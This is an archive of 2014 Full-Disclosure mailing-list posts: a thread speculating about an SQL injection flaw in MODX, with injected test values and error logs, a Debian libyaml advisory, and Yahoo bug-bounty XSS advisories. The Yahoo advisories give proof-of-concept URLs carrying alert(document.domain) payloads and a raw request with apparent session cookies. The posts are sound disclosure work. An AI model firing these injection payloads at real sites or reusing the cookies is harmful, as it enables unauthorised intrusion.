Re: [Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
FWIW I believe it is this line that is vulnerable in particular. I can't
prove this at the moment though:

core/model/modx/processors/resource/getnodes.class.php:134:
 "(SELECT COUNT(*) FROM {$this->modx->getTableName('modResource')} WHERE
context_key = modContext.{$this->modx->escape('key')} AND id IN
({$this->defaultRootId})) > 0",



On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry wrote:

> Sorry, oss-sec link:
> http://seclists.org/oss-sec/2014/q1/532
>
>
> On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry 
> wrote:
>
>> The author of the email to the oss-sec says he isn't sure if the linked
>> commit fixes the issue and it should.
>>
>> You can exploit this possibly using a blind time or boolean sqli. This is
>> me just playing around after doing some code analysis. Possibly other
>> connectors are affected? No idea about whether authentication will be
>> needed for all vectors, but in my cursory testing it needed at least a
>> PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who
>> knows).
>>
>> [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000
>> executing statement:
>> Array
>> (
>> [0] => 42000
>> [1] => 1064
>> [2] => You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use near
>> '1=1' at line 1
>> )
>>
>> [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not
>> prepare context: mgr 1=1
>> [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
>> executing statement:
>> Array
>> (
>> [0] => 42S22
>> [1] => 1054
>> [2] => Unknown column 'mgr' in 'where clause'
>> )
>>
>> [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not
>> prepare context: mgr and 1=1
>> [2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
>> executing statement:
>> Array
>> (
>> [0] => 42S22
>> [1] => 1054
>> [2] => Unknown column 'mgr' in 'where clause'
>> )
>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
Sorry, oss-sec link:
http://seclists.org/oss-sec/2014/q1/532


On Sat, Mar 8, 2014 at 11:24 AM, Brandon Perry wrote:

> The author of the email to the oss-sec says he isn't sure if the linked
> commit fixes the issue and it should.
>
> You can exploit this possibly using a blind time or boolean sqli. This is
> me just playing around after doing some code analysis. Possibly other
> connectors are affected? No idea about whether authentication will be
> needed for all vectors, but in my cursory testing it needed at least a
> PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who
> knows).
>
> [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000
> executing statement:
> Array
> (
> [0] => 42000
> [1] => 1064
> [2] => You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> '1=1' at line 1
> )
>
> [2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not
> prepare context: mgr 1=1
> [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
> executing statement:
> Array
> (
> [0] => 42S22
> [1] => 1054
> [2] => Unknown column 'mgr' in 'where clause'
> )
>
> [2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not
> prepare context: mgr and 1=1
> [2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
> executing statement:
> Array
> (
> [0] => 42S22
> [1] => 1054
> [2] => Unknown column 'mgr' in 'where clause'
> )
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MODX SQLi from oss-sec

2014-03-08 Thread Brandon Perry
The author of the email to the oss-sec says he isn't sure if the linked
commit fixes the issue and it should.

You can exploit this possibly using a blind time or boolean sqli. This is
me just playing around after doing some code analysis. Possibly other
connectors are affected? No idea about whether authentication will be
needed for all vectors, but in my cursory testing it needed at least a
PHPSESSID cookie (maybe just get first index to get anon PHPSESSID, who
knows).

[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Error 42000
executing statement:
Array
(
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'1=1' at line 1
)

[2014-03-08 11:03:33] (ERROR @ /modx/connectors/lang.js.php) Could not
prepare context: mgr 1=1
[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
executing statement:
Array
(
[0] => 42S22
[1] => 1054
[2] => Unknown column 'mgr' in 'where clause'
)

[2014-03-08 11:03:44] (ERROR @ /modx/connectors/lang.js.php) Could not
prepare context: mgr and 1=1
[2014-03-08 11:03:54] (ERROR @ /modx/connectors/lang.js.php) Error 42S22
executing statement:
Array
(
[0] => 42S22
[1] => 1054
[2] => Unknown column 'mgr' in 'where clause'
)



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2870-1] libyaml-libyaml-perl security update

2014-03-08 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2870-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
March 08, 2014 http://www.debian.org/security/faq
- -

Package: libyaml-libyaml-perl
Vulnerability  : heap-based buffer overflow
CVE ID : CVE-2013-6393

Florian Weimer of the Red Hat Product Security Team discovered a
heap-based buffer overflow flaw in LibYAML, a fast YAML 1.1 parser and
emitter library. A remote attacker could provide a YAML document with a
specially-crafted tag that, when parsed by an application using libyaml,
would cause the application to crash or, potentially, execute arbitrary
code with the privileges of the user running the application.

This update corrects this flaw in the copy that is embedded in the
libyaml-libyaml-perl package.

For the oldstable distribution (squeeze), this problem has been fixed in
version 0.33-1+squeeze2.

For the stable distribution (wheezy), this problem has been fixed in
version 0.38-3+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 0.41-4.

For the unstable distribution (sid), this problem has been fixed in
version 0.41-4.

We recommend that you upgrade your libyaml-libyaml-perl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJTGxHlAAoJEAVMuPMTQ89EbtQQAKD9QG9kNJTuFl0P777wSyAR
gQzzFjOGPP+p9Q3OWewXK2Xfk6fb6eBRk2vI3TZ63XD3KPPebhfMvRGHILp1jscI
hab6pHbp2Bs6PcX+ahEUfVhnv+7J+RxNEjjl5RWMIznUCM6G5tX4xjAbaKTnAUSZ
cbGHc3agtNXxQLGdW1eLedIZjWqVtkPQ3q7UbGl8dXbP8s1XWc0N+LJZDskFYfUT
/99qX122gFOpNPI9YGuosa+I5J0LWCJz/+qN00wx5K5uipsV52wgR4Kq+xMLV545
A1sPTpNiNkOrIvXQiWLP6JrLV39gb0G09dBCn6veCmhiagBvkSY5A8/wWphiG9k1
OKpwqYp1rFxWEpCgImU3TqiZutIM/yKopJPa+Lz4ZAb6yI62411hati7f6gqdYk1
GU3cJsPMQQ4Xz7Uj0po2gZ76UNo5skYsdOdunQv3foWDVoRNkHB1BbTsrQFBUD3u
zbih3vhLmK01lvgNYDTyhJodtCfRJumMn6o0zaWBEYOVpD7GzwABxECyDwSe626D
bs8QXWPuK5DaJ/XkntmswRkeJ3NBsGVwaZUszmTPCLLX/XEPDQls1yuYnPCUvo/4
+hNTlkEwpzW1x1G1Kpd7m2j7KsS6xpAgnt90B0RHPrTtS63xEGIgk3Z5301yxzcE
OjzJ2ZxxdRIEU6fMgC0W
=fvig
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com

2014-03-08 Thread Stefan Schurtz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi Jann,

you're right...bad description here (too much copy & paste) :)

The XSS is cookie-based, so you can find it in the cookie with the
payload.

Please see "&intl=dec52a6"-alert(document.domain)-"c8d9133635e;"

Kind regards,
Stefan

Am 08.03.2014 11:40, schrieb Jann Horn:
> On Sat, Mar 08, 2014 at 11:24:03AM +0100, Stefan Schurtz wrote:
>> The 'intl'-Paramter on "https://de-mg42.mail.yahoo.com/"; is
>> prone to a Cross-site Scripting vulnerability [...] GET 
>> https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr
>> 
>> Host: de-mg42.mail.yahoo.com [...]
> 
> Uh, where is that intl parameter you speak of? the only parameter
> I see here is .rand, which, as far as I know, just serves to 
> circumvent caching. And where is the XSS payload?
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa+J0ACgkQg3svV2LcbMCRLwCfR1L1XiqxEjnT4F8Z/MYJFbLS
KSoAnRQAMaK6woO866COwlK1kPsYaueu
=wg9L
-END PGP SIGNATURE-


0x62DC6CC0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities

2014-03-08 Thread Stefan Schurtz

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory:Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID:   SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author:   Stefan Schurtz
Affected Software:Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL:   http://yahoo.com/
Vendor Status:  Not tested anymore
Bounty:  nothing
 
==
Vulnerability Description
==
 
The 'mode'-Paramter on "https://celebrity.yahoo.com/";,
"https://movies.yahoo.com/";, "https://music.yahoo.com/"; is prone to a
Cross-site Scripting vulnerability
 
==
PoC-Exploit
==
 
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==
Disclosure Timeline
==
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==
Credits
==

Vulnerabilities found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-END PGP SIGNATURE-



0x62DC6CC0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com

2014-03-08 Thread Stefan Schurtz

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Here is the my last advisory which I've reported in 2013 to the Yahoo
Bug Bounty Program. And again...the same story for this report as for my
others :-/
 
If you're interested, you can read it here:
 
http://darksecurity.de/index.php?/259-Yahoo-Bug-Bounty-Program-Vulnerability-1-XSS-on-ads.yahoo.com.html
http://darksecurity.de/index.php?/254-Yahoo-Bug-Bounty-Program-Vulnerability-2-Open-Redirect.html

Advisory:Yahoo Bug Bounty Program Vulnerability #3
XSS on de-mg42.mail.yahoo.com
Advisory ID:   SSCHADV2013-YahooBB-002
Author:   Stefan Schurtz
Affected Software:Successfully tested on de-mg42.mail.yahoo.com
Vendor URL:   http://yahoo.com/
Vendor Status:   Not tested anymore
Bounty:   nothing

==
Vulnerability Description
==

The 'intl'-Paramter on "https://de-mg42.mail.yahoo.com/"; is prone to a
Cross-site Scripting vulnerability

==
PoC-Exploit
==

GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr

Host: de-mg42.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: YM.SREQs.schurtz=1;
YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4&
d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV;
RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0;
POPUPCHECK=1387130698530; adx=c322590@1386248182@1;
T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT&a=QAE&
sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g--~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF
LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a
DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-;
F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-
&b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN;
SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA--&
kv=0; ywadp100034076556=3167627385;
fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|
ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT;
ywadp1000357943879=4084605029;
fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879=
|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0;
YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1;
_br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; 
Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o
&p=m2evvde01200&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e;
U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-&
ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3;
YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--&d=&f=AAA&t=3bKrSB&s=55nr;
DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive

==
Disclosure Timeline
==

15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Securiy Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last
contact

==
Credits
==

Vulnerability found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa78MACgkQg3svV2LcbMA5hgCgi0sk2j/n8YAMLvQ4Nk3DMy9M
YrwAnAh2YEiFU76e8UU+RVsI9K0zkz35
=DnNI
-END PGP SIGNATURE-



0x62DC6CC0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yahoo Bug Bounty Program Vulnerability #1 XSS on ads.yahoo.com

2014-03-08 Thread Stefan Schurtz

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

In Nov ?13 I reported a Cross-site Scripting vulnerability to the Yahoo
Bug Bounty Program. As for my other reports, I?ve got no response or
feedback,
so I wrote a message to them via email this time ... and so on ... blah
blah :)
 
To cut a long story short, for all my reports the communication with
Yahoo was really bad and of course: No bounty!

Advisory: Yahoo Bug Bounty Program Vulnerability #1
XSS on ads.yahoo.com
Advisory ID:SSCHADV2013-YahooBB-001
Author:Stefan Schurtz
Affected Software: Successfully tested on ads.yahoo.com
Vendor URL:http://yahoo.com/
Vendor Status:   Seems to be fixed
Bounty:   nothing
 
==
Vulnerability Description
==
 
The '_cbv'-Paramter on "http://ads.yahoo.com"; is prone to a Cross-site
Scripting vulnerability
 
==
PoC-Exploit
==
 
http://ads.yahoo.com/st?ad_type=iframe&ad_size=300x250&site=1181425§ion_code=112260532&;
cb=1385497647.226089&publisher_blob=${RS}|gmGLFTE4OC4mbYnzUpH6dwEQOTMuMlKVBC__yxq4
|2143911627|LREC2|1385497647.226089&yud=smpv%3d3%26ed%3dzxE1dF31xQzMnXQidpJpWNtP
OVygJhcHBknzVCnpTraLTXtt8jO7OEVYpCbxEhJcwmU2x.ekTqffsDUVYgceDTs.NijijL.tGPKwsdRUsLvxftzYGe
.0VUghSSHioqjLjQJ7KaidIocpC1oj2SKC4lg_EhLiMsmgXiq6wbNVL_VzG1fHxP77ptF04VC7jL7lL1vr0iRs.r6
8cRSLiFUFzH_pvnaxUy8-&_msd=1&_xcf=1&_exv=RDnhGI4wnN7uv.jS65VPBVAFmZBbevIBHZGnRIl5vxDV&_msig=10sorm5kd&rmxbkn=0&_cbv=132025816&81c91"-alert(document.domain)-"1580bfdcb31=1

==
Disclosure Timeline
==

28-Nov-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Securiy Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response @ Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response @ Yahoo) //
last contact

==
Credits
==

Vulnerability found and advisory written by Stefan Schurtz.

==
References
==

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-001.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa754ACgkQg3svV2LcbMCOdwCeIA7oMkSnPBbwwWTDlQRV4igR
YcsAnim2G2fNSu42X8E2PXfSM2TNFqd9
=G3sf
-END PGP SIGNATURE-



0x62DC6CC0.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/